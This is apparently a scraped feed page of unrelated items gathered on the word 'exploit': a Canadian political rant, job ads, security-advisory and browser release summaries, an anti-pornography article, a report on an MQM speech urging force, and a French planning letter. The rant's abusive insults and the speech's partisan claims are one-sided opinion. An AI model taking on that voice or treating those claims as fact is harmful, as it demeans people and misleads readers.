    And, when he suffers cognitive dissonance from encountering new facts that are unexplainable by his Liberal worldview, he simply stops thinking about them. And, of course, this process works for previously accepted knowledge that no longer fits with his present Liberal world-view bubble. This explains his ability to have had sincere, fruitful discussions with David Suzuki about the dangers of Climate Change and what is necessary to counteract these grave dangers, and then, following his attaining power, to simply stop talking to Suzuki. Upon gaining power, Trudeau and the Liberals immediately embraced "pragmatism," or, balancing the "needs" of the psychopaths in Calgary and Toronto's Bay Street with those of the environment and the human race.


    This has to be done of course because there's a competing political party that's vying for power: The morons and troglodytes and sleazy con-artists and religious freaks and pathetic closet-cases who comprise the Conservative Party of Canada. These shit-heads deny the reality of climate change and make no pretense of serving anyone other than the capitalist elite. (That's not exactly true. They DO gratify their voting base with policies of discrimination and racism and other forms of bigotry towards scapegoats and the weak. The low-functioning level of their voting base is such as to be easily requited with the abuse of "the other" even as their own lives continue to deteriorate as a result of the main thrust of their own party's policies.)

    So it is with Trudeau's false promises to the First Nations. Whatever he wants to think, Trudeau remains part of an imperialist-colonialist project of genocide against the First Nations. Their precedence on these lands, and their existing claims on rights and resources are a hindrance to the capitalist project of exploitation and so they are to be eliminated. Canada did not have the power to simply massacre them all at once and so has settled for long-term "low-intensity-conflict" wherein we destroy their languages and cultures and deprive them of services and resources (while forbidding them from accessing their own resources) and, when necessary, we break solemn promises to them while continuing to deny them the resources they surrendered and the actions they had taken, in return for those promises.

    And Trudeau justifies all of this behaviour with standard Liberal platitudes, and he is able to do this because he exists within a bubble of self-reinforcing Liberal platitudes. That's how he and his witless Environment Minister can pose in super-hero costumes as "Climate Superheroes" while they continue to suck dirty tar out of the ground to give to the Chinese to burn. It's how Trudeau can continue to give heartfelt apologies to past crimes against the First Nations while continuing to inflict new ones upon them and pretending that the vast majority of the First Nations do not now hate his guts and despise the sound of his voice.


    Because he's surrounded himself with a bubble of stupid Liberals and stupid Liberal platitudes. All day, every day, he's immersed in a soothing bath of "We make sure that every Canadian has a chance to reach their fullest potential" and "Politics is the art of the possible and we are the ultimate in what is possible" and "We represent ALL Canadians, rich and poor, all creeds and colours."

    How to conclude this little shpiel? I don't know. Break that bubble. But how? I've sent my own Liberal MP some e-mails but I can't even be sure that he reads them.



              Commenti su “Fare cose pazze, non morire”: l’alpinismo secondo Reinhold Messner di albert      Cache   Translate Page      
    A proposito di Cesare .Aggiunta da "poco": Medaglia di Bronzo al valor civile ed Ordine del Cardo per il suo impegno in salvataggio o recupero di altri alpinisti.Ancora pero'si insiste su quei chiodi di cui egli stesso consapevolmente ha divelto una parte.Il primo a fregarsene di rivangare e' Egli stesso....segno che ormai la maturita' va OLTRE...in un'altra prospettiva.Anche altri diventati Saggi rimeditano e rielaborano , ad esempio Maurizio Zanolla.Offrono spunti e riflessioniche vanno oltre gli exploits, emerge il lato umano introspettivo delle vicende .
              Agent soutien technique, Télébec - Bell - Val-d'Or, QC      Cache   Translate Page      
    Une expertise des systèmes d’exploitation Windows 7,8, et 10, Vista, MAC et Outlook. Code de demande:....
    From Bell Canada - Thu, 13 Sep 2018 22:39:21 GMT - View all Val-d'Or, QC jobs
              Analyste au support - Support Analyst - Exela Technologies - Montréal, QC      Cache   Translate Page      
    Les systèmes d’exploitation de Microsoft, incluant XP, Vista, 2003 et 2008. Microsoft Windows Server and Workstation including XP, Vista, 7, 2003 and 2008...
    From Indeed - Fri, 28 Sep 2018 20:27:37 GMT - View all Montréal, QC jobs
              Technicien au centre d'assistance - français / anglais / espagnol / portugais - CGI - Montréal, QC      Cache   Translate Page      
    Bonne connaissance des systèmes d'exploitation Windows NT, XP, Vista, 7. Description du poste :....
    From CGI - Fri, 13 Jul 2018 15:12:47 GMT - View all Montréal, QC jobs
              VERT Threat Alert: October 2018 Patch Tuesday Analysis      Cache   Translate Page      

    Today’s VERT Alert addresses Microsoft’s October 2018 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-800 on Wednesday, October 10th. In-The-Wild & Disclosed CVEs CVE-2018-8453 This vulnerability, a privilege escalation in Win32k’s handling of objects in memory, has been exploited in the wild. According to ZDNet, the exploit […]… Read More

    The post VERT Threat Alert: October 2018 Patch Tuesday Analysis appeared first on The State of Security.


              Fuseau horaire : Comment régler la date et l’heure sur kodi ?      Cache   Translate Page      

    Si vous exécutez Kodi sur une machine Android, sachez que Kodi affiche ses propres date et heure, qui peuvent être différentes d’Android. Et selon le périphérique et le système d’exploitation que vous utilisez, l’un est plus important que l’autre. La réponse la plus simple est de s’assurer que les deux sont correctement définis. Comment régler […]

    Cet article Fuseau horaire : Comment régler la date et l’heure sur kodi ? est apparu en premier sur Actualité High-Tech, applications Android gratuites, extensions Media center et produits intelligents.


              Cameron Kaiser: TenFourFox FPR10b1 available      Cache   Translate Page      
    TenFourFox Feature Parity 10 beta 1 is now available (downloads, hashes, release notes). This version is mostly about expanded functionality, adding several new DOM and JavaScript ES6 features, and security changes to match current versions of Firefox. Not everything I wanted to get done for this release got done, particularly on the JavaScript side (only one of the ES6 well-known symbols updates was finished in time), but with Firefox 63 due on the 22nd we'll need this period for sufficient beta testing, so here it is.

    The security changes include giving document-level (i.e., docshell) data: URIs unique origins to reduce cross-site scripting attack surface (for more info, see this Mozilla blog post from Fx57). This middle ground should reduce issues with the older codebase and add-on compatibility problems, but it is possible some historical add-ons may be affected by this and some sites may behave differently. However, many sites now assume this protection, so it is important that we do the same. If you believe a site is behaving differently because of this, toggle the setting security.data_uri.unique_opaque_origin to false and restart the browser. If the behaviour changes, then this was the cause and you should report it in the comments. This covers most of the known exploits of the old Firefox behaviour and I'll be looking at possibly locking this down further in future releases.

    The other notable security change is support for noopener, but using the soon-to-be-current implementation in Firefox 63. This feature prevents new windows (that were presumably unwittingly) opened to a malicious page from that page then trying to manipulate the page that opened it, and many sites already support it.

    This release also now prefs MSE (and VP9) to on by default, since YouTube seems to require it. We do have AltiVec acceleration for VP9 (compare with libvpx for Chromium on little-endian PowerPC), but VP9 is a heavier codec than VP8, and G4 and low-end G5 systems will not perform as well. You can still turn it off for sites that seem to do better with it disabled.

    There are two known broken major sites: the Facebook display glitch (worse on 10.5 than 10.4, for reasons as yet unexplained), and Citibank does not load account information. Facebook can be worked around by disabling Ion JavaScript acceleration, but I don't advise this because of the profound performance impact and I suspect it's actually just fixing a symptom because backing out multiple changes in JavaScript didn't seem to make any difference. As usual, if you can stand Facebook Basic, it really works a lot better on low-power systems like ours. Unfortunately, Citibank has no such workaround; changing various settings or even user agents doesn't make any difference. Citibank does not work in versions prior to Fx51, so the needful could be any combination of features newly landed in the timeframe up to that point. This is a yuuuge range to review and very slow going. I don't have a fix yet for either of these problems, nor an ETA, and I'm not likely to until I better understand what's wrong. Debugging Facebook in particular is typically an exercise in forcible hair removal because of their multiple dependencies and heavy minification, and their developer account has never replied to my queries to get non-minified sources.

    So, in the absence of a clear problem to repair, my plan for FPR11 is to try to get additional well-known symbols supported (which should be doable) and further expand our JavaScript ES6/ES7 support in general. Unfortunately for that last, I'm hitting the wall on two very intractable features because of their size which are starting to become important for continued compatibility. In general my preference is to implement new features in as compartmentalized a fashion as possible and preferably in a small number of commits that can be backed out without affecting too much else. These features, however, are enormous in scope and changes, and depend on many other smaller changes we either don't need, don't want or don't implement. They also tend to affect code outside of JavaScript such as the script loading environment and the runtime, which is problematic because we have very poor test coverage for those areas.

    The first is modules (we do support classes, but not modules), introduced in Firefox 60. The metabug for this is incredibly intimidating and even the first "milestone 0" has a massive number of dependencies. The script loader changes could probably be implemented with some thought, but there is no way a single programmer working in his spare time can do the entire amount of work required and deal with all the potential regressions, especially when rebuilding JavaScript takes up to 20 minutes and rebuilding the browser takes several hours or more. The silver lining is that some sites may need refactoring to take advantage of modules, so wide adoption is not likely to occur in the near term until more frontend development tools start utilizing them.

    The second, unfortunately, is already being used now: async functions, introduced in Firefox 52, and really co-routines by any other name. The work to support them in the parser is not trivial but I've mostly completed it, and some of that code is (silently) in FPR10. Unfortunately, the await keyword works in terms of ES6 Promises, which we definitely do not support (we only have support for DOM Promises, which are not really interchangeable at the code level), and which extend hooks into the browser event loop to enable them to run asynchronously. You can see the large number of needed changes and dependencies in that Github issue as well as the various changes and regressions that resulted. This problem is higher priority because the feature is tempting to developers and some sites already make use of them (you usually see an odd syntax error and stuff doesn't load in those situations); the code changes needed to convert a function to asynchronous operation are relatively minor while yielding (ahem) a potentially large benefit in terms of perceived speed and responsiveness. However, there is no good way to make this work without ES6 Promise, and the necessary parser changes may cause code to run that can never run correctly even if the browser accepts it.

    I don't have good solutions for these looming problems but I'll try to continue making progress on what I know I can fix or implement and we'll examine what this means for feature parity as time progresses. Meanwhile, please try out the beta and post your comments, and expect FPR10 final later this month.


              BCEJP00017403 - Analyste principal sécurité - Modis Canada - Montréal, QC      Cache   Translate Page      
    Analyste principal sécurité Assure la planification, la conception, la construction et l'exploitation des réseaux de la compagnie de plusieurs milliards de...
    From Modis Canada - Fri, 05 Oct 2018 21:37:09 GMT - View all Montréal, QC jobs
              New VMSA-2018-0025 and Intel Graphics Driver Unified Shader Compiler Security Updates      Cache   Translate Page      

    Today, VMware has released the following new security advisory: VMSA-2018-0025 – VMware ESXi, Workstation, and Fusion workarounds address a denial-of-service vulnerability This documents an important severity denial-of-service vulnerability that affects VMware ESXi, Workstation and Fusion. This issue arises due to an infinite loop in the 3D-rendering shader. Successfully exploiting this issue may allow an attacker […]

    The post New VMSA-2018-0025 and Intel Graphics Driver Unified Shader Compiler Security Updates appeared first on VMware Security & Compliance Blog.


              Systems Maintenance Technician and Trainer - Leidos - Virginia Beach, VA      Cache   Translate Page      
    Recent Operational experience in Ships Signals Exploitation Space (SSES) aboard CG, DDG, or LPD class ships....
    From Leidos - Thu, 04 Oct 2018 17:07:40 GMT - View all Virginia Beach, VA jobs
              Assistante(e) technique en pharmacie- Temps Partiel - Pharmaprix - Montréal, QC      Cache   Translate Page      
    Lieu: 4999 Chemin Queen Mary, Arr. Cdn / Ndg, Montreal, Québec, H3W 1X4 Joignez-vous à un magasin qui appartient à des intérêts locaux et est exploité par...
    From Shoppers Drug Mart / Pharmaprix - Tue, 09 Oct 2018 21:32:10 GMT - View all Montréal, QC jobs
              Mega Porn Company Targeting Your Youngsters Through Video Games      Cache   Translate Page      

    Porn is now making major inroads into two areas that will tighten its grip even moreonline gaming and virtual reality.

    According to Ben Miller, Digital Strategies Coordinator for the National Center on Sexual Exploitation (NCSE), even as recently as 2013, the number of video games containing pornographic sexual violence was minimal. But those numbers are now skyrocketing.

    One popular video game website hosted about 780 games with nudity in 2017, but in 2018 they now host over 1,600 such games.

    Now, a company that owns a large number of top porn sites and studios has started a distribution platform for online pornographic games.

    Miller said, "Porn games don't simply contain sex and nudity. Rather, they are much more graphic. Some of these games promote sexual harassment and assault. Despite being cartoons, the graphic content in these games is far from harmless. Animated porn fuels sexual addiction and shapes sexual palettes just as regular porn does."

    Alarmingly, the distributor provides free-to-play games in addition to their purchased products. This free option will allow young kids easier access to the content, bypassing paywalls intended to block children's ability to play the games.

    NCOSE noted that the provider's website traffic has exploded from 50 million to 115 million visits between April and August 2018, ranking it in the top 500 websites in the world.

    Parents need to be aware of the impact the increase in pornographic online gaming may have on their children.

    Marriage and Family Therapist Dr. Jill Manning told Internet Security 101, "Parents need to understand how intricately linked the gaming industry and pornography industry are. More and more games have pornography embedded in them. If kids play online, that is a pornographer's heyday for marketing, grooming and hooking young consumers."

    Virtual Reality (VR) Is Also Booming

    Another major adult gaming portal announced in May that it is expanding into virtual reality with two new VR products. Through the use of a headset such as the Oculus Rift (owned by Facebook), a viewer is able to enter a totally manufactured environment and tune out the reality of their actual situation.

    Fortune magazine stated, "By 2025, adult virtual reality content is forecast to be a $1 billion business, the third biggest sector behind video games and NFL-related content, according to Piper Jaffray analyst Travis Jakel."

    Todd Glider, CEO of VR adult entertainment company BaDoink, clearly stated that "VR will become the standard in the industry for today's younger male consumers."

    He continued, "I see it through a generational lens. VR porn will not have a pronounced effect on the demographic born before 1980. However, for the generations born after, the ones that reach adulthood in a world where 24/7 access to adult content is just a mouse click away, that's the audience for VR porn, and it will be huge."

    Josh McDowell's VR Experience

    Christian apologist and evangelist Josh McDowell, is featured in the Conquer Series, a powerful cinematic DVD course that is helping families deal with pornography. In the Conquer Series McDowell describes his experience with virtual reality. He asked to have a villa created. When he put on the headset, he was amazed at the total immersion experience and felt he was actually in the villa.

    "And then it hit me, " McDowell said. "What this would do with pornography, and nobody's talking about it. Like one pornographer said, 'It's been our dream as pornographers for 100 years'. It'll take pornography from here, right through the ceiling. It'll make everything I've said about pornographyor anyone else [has said] over the last eight yearschild's play."

    McDowell added, "Is the church ready for this? No! Because the church is not aware of it. I can hardly find anyone that understands virtual reality in the church. Pastors or anything. I mean, you say, "Well, do you know what Oculus Rift is?" It's like they're in wooly-wooly land. The church is not ready for it, and we don't have long. It's already mainlined in the world. When it becomes mainlined in the church it's a hundred times harder to equip people for it."

    The Threat Is Real; Protect Your Children

    The pornography industry has no intentions of backing off or slowing down in its quest to continually find more distribution pathways. Parents must be diligent in their efforts to protect their children from the onslaught of porn.

    Viewing virtual reality requires wearing a headset, which most children probably couldn't afford. But the free-to-play online games are easy to access and can be done more secretly.

    Here are some steps you can take to protect your children.

    1. Keep the gaming device or computer in a high-traffic area, not in the child's room, even if you already have an internet filter service.
    2. Remove the headphones and make them use the computer's speakers so you can hear any online chatting.
    3. Set up all of your children's game accounts and console controls. You decide who has access to their gaming profile and whom your child can talk to. Learn how to use the parental controls that are built into the console.
    4. Read reviews and understand the industry rating system. Make sure the game is age-appropriate.
    5. Talk to your children. Teach them basic internet safety roles and to notify you if they encounter anything unusual or unsettling while they are playing. Build a non-shaming relationship with your child so that if they do come across adult content, they can approach you and talk about it.

    Prepare Your Family

    The global porn epidemic touches all of our lives. Perhaps you struggle with pornography and want to break free of its hold on you. Or maybe you want to learn more about the problem so you can be better prepared to protect your family.

    The 12-DVD Conquer Series was created to give men a proven resource to help them achieve a porn-free life. The powerful video segments, compelling testimonies and strong biblical teaching will equip you with valuable information about the porn battle.

    Find out more at ConquerSeries.com


              442317-2018: Norvège-Sandvika: Services d'exploitation des autoroutes      Cache   Translate Page      
    Date de publication: 10/10/2018 | Date limite: | Document: Avis d'attribution de marché
              Won't accept Pak's double standard of justice: MQM chief      Cache   Translate Page      

    [United Kingdom], Oct 10, (ANI): Muttahida Qaumi Movement (MQM) founder and leader Altaf Hussain on Wednesday vowed to rebuild a new state for Mohajir people who have allegedly been denied equal rights and justice by Pakistan from the past several decades.

    Speaking at his 65th anniversary here, Hussain said, "Justice system in Pakistan is of dual standard, which is unacceptable. We would either accept a fully autonomous and powerful province for Mohajirs or a complete new Mohajir State. We won't accept anything less than either of these options."

    The MQM founder discussed in detail the prevailing anti-Mohajir and anti-Baloch policies of the state of Pakistan and asked, "What would be the exact feelings on seeing others occupying the house on gun points, exploiting all resources on the basis of power and influence? This is the typical situation that calls for use of power to retrieve the stolen rights. The oppressors would never listen to us unless we use the same strategy, say the use of power to repel them out of our lands"

    Elaborating on the ongoing issue, Hussain added, "This is the typical situation that calls for use of power to retrieve the stolen rights. The oppressors would never listen to us unless we use the same strategy, say the use of power to repel them out of our lands."

    The MQM founder further said that he has been questioned as to why he had slammed Pakistan ignoring that his people have been kidnapped and enforced to disappear and are extra-judicially murdered and these things are enough to upset any sensible mind. When Mohajir women visited Martyrs' monument at Azizabad, they were subjected to torture and arrest and even minor children were also not spared, he noted.

    "Mohajirs' ancestors created Pakistan but today their offspring are denied of their just equal rights and are treated as slaves. Mohajirs had laid 2 million lives for the creation of Pakistan but they armed forces of the country had slaughtered more than 22, 000 Mohajirs during special crackdowns. Not only this but a senescent leader of the Movement, a 70-year old academician Prof. Dr Hassan Zafar Arif was picked and murdered by the armed forces of the country on Jan 13, 2018, forgetting his role in educating millions in Pakistan. Are the armed forces and law enforcers for peoples' protection or butchering them? Will they be saluted or slammed?" he questioned.

    Stressing on the inequality faced by Mohajirs, Hussain said when Pakistan Muslim League-Nawaz (PML-N) President Shehbaz Sharif was produced in the court of law, his party workers were possessing armoured personnel carrier, but the police did not book them for any offence. "But when the women journalists belonging to Mohajir community entered an office of a Pakistani private television company asking them to be unbiased in reporting, the paramilitary Rangers and Police tortured them and later lodged them in jail. The Rangers had also killed one of the youngest workers of the movement."

    "Tehreek-e Labbaik had attacked media houses, police stations and public property but they were felicitated with cash prizes while MQM women were subjected to torture and straight fire. Why this double standard? The Chief Justice of Pakistan ignored Khadim Hussain Rizvi who openly called names to him but on the contrary, the CJP awarded sentences to other political leaders in the garb of contempt to court."

    Hussain continued, "Not only that, the Creator of Pakistan's nuclear programme and the atomic bomb, Dr Abdul Qadeer Khan was also a Mohajir but was humiliated and the entire credit was given to a Punjabi Scientist Dr. Samar Mund. Was that not sheer bias against the Mohajir Nation? We won't accept this double standard of justice, denied of justice. The state institutions are not willing or ready to listen to us and are taking all measures to eliminate us. Either we would accept a fully autonomous and powerful province or we would fight for independent Mohajir State."

    The MQM leader also touched upon the issues of the Baloch community and said, "Pakistan's army is butchering the innocent Baloch youths because they are demanding equal rights. The army is killing them after declaring them as terrorists. Army has to roll back their plans and they would have to free Balochistan and we are the supporters of free and independent Balochistan."

    While addressing the people of Punjab, he asked them to take to streets for supporting Baloch and Mohajirs in their fight for equality and human rights. Hussain also clarified that he had never slammed Pakistan but had slammed its corrupt and butchering feudal system."Pakistan should be free from the decayed feudal system, corrupt Capitalist system and that everyone in Pakistan should have equal rights and equal citizens. The minorities in Pakistan, especially the Ahmedi, should also be respected with regard to their rights and religious freedom as Pakistani citizens."

    Hussain also talked about the judicial system of the Pakistan and said, "It is beyond reasoning that the apex court of Pakistan has declared Nawaz Sharif as most dishonest person but, on the other hand has held Imran Khan Niazi, the Prime Minister of Pakistan as most honest person ignoring the fact that the court of Los Angeles had already declared him as fornicator, a biological father of a girl child he reproduced out of marriage."

    "Everything in Pakistan is done either by Pakistan's army or on its dictation and no institutions in Pakistan including the judiciary is free from the clutches of the army. What the courts in Pakistan are doing is only done on army's behest and dictation," he added.

    Hussain also alleged that courts in Pakistan declare anyone as a traitor if instructed to do so by the Army. "The country is under siege," he added. (ANI)


              Stagiaire en Informatique – technologies d'exploitation minière - Rio Tinto - Havre-Saint-Pierre, QC      Cache   Translate Page      
    On les trouve partout, des téléphones intelligents aux avions et aux voitures, en passant par les hôpitaux et les maisons....
    From Rio Tinto - Sat, 22 Sep 2018 11:00:13 GMT - View all Havre-Saint-Pierre, QC jobs
              Lettre au Commissaire Enquêteur au sujet du Plan Local d'Urbanisme de Vulbens      Cache   Translate Page      

    plu,vulbens,frédéric budan(Pour information vous trouverez ci-dessous une lettre que j'adresse au commissaire enquêteur au sujet du PLU de Vulbens. Un PLU qui menace la qualité de l'aménagement de tout le Genevois. Un PLU qui menace le cadre de vie et les équilibres budgétaires de la commune. Il revient aux habitants de Vulbens de préserver leur village, leur cadre de vie, leur mobilité... et les finances communales face à des propriétaires fonciers qui ont manifestement u défendre leurs intérêts patrimoniaux).

    Vous pouvez écouter sur le sujet :

    https://www.radiolac.ch/actualite/cest-contraire-aux-engagements-de-reduction-du-trafic/

     

    Monsieur le Commissaire Enquêteur,

    Il est rare qu’un élu local d’une commune voisine, intervienne en tant que citoyen dans une enquête publique. Les rares fois où cela arrive c’est pour appuyer un intérêt général par ailleurs contesté. A ma connaissance, ce courrier est tout à fait exceptionnel. Il a pour objet de dénoncer avec force les dérives les plus scandaleuses du Plan Local d’Urbanisme (PLU) arrêté par la commune de Vulbens. Ce courrier ne saurait cependant les lister toutes.

    Un Plan Local d’Urbanisme, comme son nom l’indique, a pour objet de planifier localement l’urbanisation. C’est un acte majeur d’aménagement d’une commune. Il engage la commune et ses habitants pour les générations futures. Il a pour objet principal de définir où et comment une commune doit se développer. La gestion des intérêts patrimoniaux de quelques familles relève d’un conseil en gestion de patrimoine ou d’une banque mais certainement pas d’un PLU. Aussi j’ai été éberlué d’apprendre des élus de Vulbens qu’avant tout travail sur le PLU, ces derniers ont réunis les propriétaires fonciers pour qu’ils fassent état de leurs souhaits et de leurs projets. J’ai été effaré d’apprendre suite à la commission d’aménagement de l’intercommunalité que les souhaits des propriétaires avait guidé l’élaboration du Plan Local d’Urbanisme. J’ai été surpris de constater les incohérences en matière d’aménagement avec des tènements agricoles à proximité du centre bourg et à l’opposé des tènements aujourd’hui exploités qui sont devenus constructibles. Abasourdi d’entendre l’explication donnée par les élus pour justifier de ces incohérences selon lesquels les propriétaires des parcelles à urbaniser ont des projets à court terme alors que les propriétaires des parcelles agricoles proches du centre bourg n’en auraient pas. Comment cela peut-il guider des décisions d’aménagement dont la mise en œuvre doit normalement s’étaler sur une dizaine d’années ?

    Le Schéma de Cohérence Territoriale tout comme les services de l’Etat définissent précisément les extensions. Le Schéma de Cohérence Territorial fixe à 5 hectares les extensions autorisées à la commune de Vulbens : c’était déjà une exception pour un village. Unilatéralement, la commune s’étend sur près de 14 hectares.

    Je souhaite attirer votre attention sur les conséquences d’un tel PLU au-delà de la destruction majeur du cadre de vie des habitants de Vulbens au profit de l’intérêt patrimonial de quelques familles.

    Puisque les élus de Vulbens ont vérifié que les propriétaires fonciers avaient des projets à court terme, les extensions permettront très prochainement la construction de 600 logements et donc l’installation de 1200 habitants supplémentaires. Les inédits taux de rétention foncière utilisés par la commune de Vulbens conduisent à bien calculer 600 logements supplémentaires et non pas 600 habitants comme le prétend la commune. Il faut ajouter à cela la densification des zones déjà bâties qui selon diverses estimations permettront la construction de 1000 à 2000 logements additionnels. Pour la crédibilité de la démonstration, nous retiendrons l’hypothèse basse de 1000 logements et donc 2000 habitants. Entre extension et densification urbaine, avec un tel PLU la commune de Vulbens accueillerait donc 3200 habitants supplémentaires et triplerait de taille dans quelques années ! Une réalité bien éloignée de ce qui est avancé dans le Plan Local d’Urbanisme.

    Du point de vue de la mobilité, à raison de 4 déplacements par habitant en moyenne, cela représente 12800 déplacements supplémentaires sur des voies déjà saturées. La desserte en transport en commun ne sera jamais possible en raison de l’éloignement de Vulbens des centres urbains qui conduit à des déficits d’exploitation inabordables pour les budgets publics. Il restera essentiellement les déplacements individuels motorisés. Pour rappel, les communes limitrophes françaises et suisses sont engagées dans un protocole d’accord visant à réduire le trafic aux petites douanes. L’urbanisation délirante de Vulbens conduirait à un échec de ce plan d’action qui conduirait inévitablement à une fermeture des dites douanes au détriment de l’intérêt général. Les habitants de St Julien subiraient largement les nuisances de ces flux de véhicules supplémentaires alors même que la commune vient de réaliser un investissement majeur de 22 millions d’euros pour faciliter l’accès à la ville.

    3200 habitants supplémentaires signifient également environ 380 enfants supplémentaires dans les écoles primaires à la charge de la commune (ratio de 12% des habitants). Soit 15 classes à construire à 400’000 euros pièces, soit un budget d’investissement de 6 millions d’euros qui excèdent de loin les capacités d’une commune déjà endettée. A cela devrait s’ajouter des dépenses de fonctionnement de 1500 euros par élèves et par an, soit près de 600’000 euros par an et bien au-delà des contributions des familles au budget communal. Alors que quelques propriétaires fonciers riraient aux éclats sur le chemin les conduisant à la banque, les contribuables de la commune devraient assumer des augmentations d’impôts vertigineuses pour faire face aux charges publiques d’une croissance démographique délirante. Cette démonstration de la saturation des équipements scolaires en raison d’une croissance urbaine absurde peut être dupliquée sur l’intégralité des équipements publics : eau, assainissement, collèges, lycées, hôpitaux, justice et police… Une étude réalisée dans le cadre du projet d’agglomération indique que les équilibres financiers d’une commune peuvent être maintenus avec une croissance démographique maitrisée jusqu’à 2 à 3% par an, soit environ 20 logements par an pour Vulbens. Le PLU proposé, même s’il était étalé sur 10 années, conduirait à une croissance démographique de 21% par an !

    La commune argumente ses décisions en raison des prétendus « coups partis » de permis d’aménager qu’elle a accordé récemment de manière très opportune pour les propriétaires fonciers concernés. Il faut une sacré mauvaise foi pour ne pas utiliser le sursis à statuer en accordant des permis manifestement contraire aux documents d’aménagement et se fonder sur l’argument des coups qu’on a laissé partir pour justifier des dérives d’un Plan Local d’Urbanisme dans une procédure d’enquête publique. Par ailleurs, j’attire votre attention sur le fait que la loi ne garantit nullement des droits à bâtir au pétitionnaire d’un permis d’aménager, même lorsque les travaux sont en cours. Les coups partis peuvent et doivent être stoppés. Il est encore temps de cesser le massacre.

    Vous pourrez connaitre précisément les noms des propriétaires fonciers bénéficiaires de ces extensions outrancières. Vous pourrez alors rapprocher ces noms des noms de familles des élus qui ont voté la délibération. Le cas échéant, si vous constatiez des prises illégales d’intérêts lors du vote des délibérations, conformément à l’article 40 du code pénal, vous auriez le devoir d’en informer le procureur de la république afin qu’il puisse, si nécessaire, donner les suites pénales prévues par la loi. Les citoyens qui n’ont pas un accès aisé au registre des propriétaires comptent sur votre vigilance.

    Ce courrier n’a pas pour objet de vous convaincre d’émettre un avis défavorable. Les avis défavorables et unanimes de l’Etat, de la communauté de communes et de la Chambre d’Agriculture, tout à fait exceptionnel tant par leur nature que leur force, aussi bien que la simple lecture du PLU doivent déjà vous conduire à émettre un avis défavorable. Cette lettre ne modifiera probablement pas la nature de votre avis, mais je vous écris pour vous recommander d’émettre votre avis avec force. En effet, je vous écris surtout pour vous alerter sur la profonde conviction que la commune ignorera tous les avis défavorables : les enjeux financiers sont trop importants pour que les intérêts patrimoniaux exprimés avant la démarche de PLU ne cèdent face à de simples avis défavorables qui ne sont que consultatifs. La loi autorise la commune à adopter ce scandaleux PLU malgré tous les avis défavorables. Inévitablement de multiples recours seront introduits. Cependant, les délais de jugement du tribunal administratif permettront aux propriétaires de faire leurs plus-values et aux promoteurs de faire leur œuvre pendant que l’équipe municipale aura le temps de terminer son mandat. Les habitants de Vulbens et des communes environnantes devraient alors en subir les conséquences pour les décennies à venir et les générations futures. En effet, la commune de Vulbens s’est déjà illustrée dans sa capacité à refuser les règles communes lors du transfert de la compétence Eau à la communauté de communes puisqu’elle avait refusé de transmettre les comptes publics de son budget annexe eau, qui avait déjà révélés quelques désagréables surprises a posteriori.

    Ce Plan Local d’Urbanisme ridiculiserait tout le Genevois français tant il contreviendrait aux engagements collectifs pris dans le cadre du projet d’agglomération du Grand Genève de maitrise du mitage du territoire et traduits dans les Schémas de Cohérence Territoriale. Quelle crédibilité auront nous si une municipalité peut s’affranchir de respecter les lois et règlements qui l’obligent à se mettre en conformité avec le SCOT dans un délai de trois ans qui suit son adoption ? La perception des citoyens qui constateraient que l’aménagement du territoire de cette agglomération aurait été dicté par des intérêts fonciers plutôt que l’intérêt général comme si nous étions encore au siècle passé, rejaillirai sur l’ensemble des élus du Genevois et discréditerai un peu plus la crédibilité des institutions publiques qui auront laissé faire, y compris le tribunal administratif qui vous a nommé. Il fut un temps où les propriétaires fonciers veillaient à être bien représentés à la table du conseil pour faire valoir leurs intérêts. On n’y parlait pas d’aménagement lorsqu’on débattait du PLU, mais on y jouait à « qui veut gagner des millions ? ». Ce temps est révolu. Selon les conclusions de votre enquête il doit l’être définitivement.

    Peut-être que la crainte de poursuites pénales à l’encontre des conseillers municipaux qui se rendront coupables de prise illégale d’intérêt pourrait dissuader certains d’approuver le document en l’état, voir même de retirer la délibération d’arrêt du PLU. Un jugement extrêmement rapide et en urgence du tribunal administratif sur un éventuel recours serait indispensable avant que le mal ne soit fait de manière irréparable, mais il vous revient d’en alerter le tribunal administratif pour que le cas échéant il fixe en urgence une date d’audience. Il me semble toutefois utile d’attirer votre attention sur le fait qu’un simple avis défavorable ne suffira pas à bloquer ce scandaleux PLU. Le plus sûr étant que les habitants de Vulbens eux même se révoltent contre un projet de dégradation aussi manifeste de leur cadre de vie et des finances communales. Cependant, les termes absconds des PLU conduisent trop souvent les habitants à n’en comprendre les enjeux que lors des dépôts des permis de construire, lorsque c’est trop tard.

    Je me tiens à votre disposition pour tout renseignement complémentaire. Je vous prie de croire, Monsieur le Commissaire Enquêteur, à l’expression de ma profonde considération.

     

    Antoine Vielliard

     

    Avis défavorable de l’Etat : http://www.vulbens.fr/files/plu_vulbens_avis_etat.pdf

    Avis défavorable unanime du bureau de la communauté de communes : http://www.vulbens.fr/files/plu_vulbens_avis_ccg.pdf

    Avis défavorable de la Chambre d’Agriculture : http://www.vulbens.fr/files/plu_vulbens_avis_chambre_dagriculture.pdf


              442317-2018: Norvège-Sandvika: Services d'exploitation des autoroutes      Cache   Translate Page      
    Date de publication: 10/10/2018 | Date limite: | Document: Avis d'attribution de marché
              Apple publie iOS 12.0.1 pour corriger plusieurs bugs      Cache   Translate Page      
    Afin de colmater plusieurs bugs découverts au sein d’iOS 12, Apple propose une nouvelle version de son système d’exploitation mobile. Il s’agit de la version 12.0.1 d’iOS qui corrige des problèmes d’accès au WIFI et des problèmes de mise en … Continuer la lecture
              Hacker penetrates Spankchain smart contract, escapes with booty      Cache   Translate Page      
    A hacker exploited a re-entrancy bug in the Spankchain payment channel contract.
              442317-2018: Norvège-Sandvika: Services d'exploitation des autoroutes      Cache   Translate Page      
    Date de publication: 10/10/2018 | Date limite: | Document: Avis d'attribution de marché
              The Novel of Ferrara [electronic resource] by Bassani, Giorgio.      Cache   Translate Page      
    -- The Novel of FerraraWithin the WallsSet in the northern Italian town of Ferrara before, during, and after the Second World War, these interlocking stories present a fully rounded world of unforgettable characters: the respected doctor whose homosexuality is tolerated until he is humiliatingly exposed by an exploitative youth; a survivor of the Nazi death camps whose neighbors’ celebration of his return gradually turns to ostracism; a young man discovering the ugly, treacherous price that peop
              Apple publie iOS 12.0.1 pour corriger plusieurs bugs      Cache   Translate Page      
    Afin de colmater plusieurs bugs découverts au sein d’iOS 12, Apple propose une nouvelle version de son système d’exploitation mobile. Il s’agit de la version 12.0.1 d’iOS qui corrige des problèmes d’accès au WIFI et des problèmes de mise en … Continuer la lecture
              Developing: 123 Missing Kids Rescued In Historic Wayne County Child Sex Slave Raids      Cache   Translate Page      


    By Brandon Hall
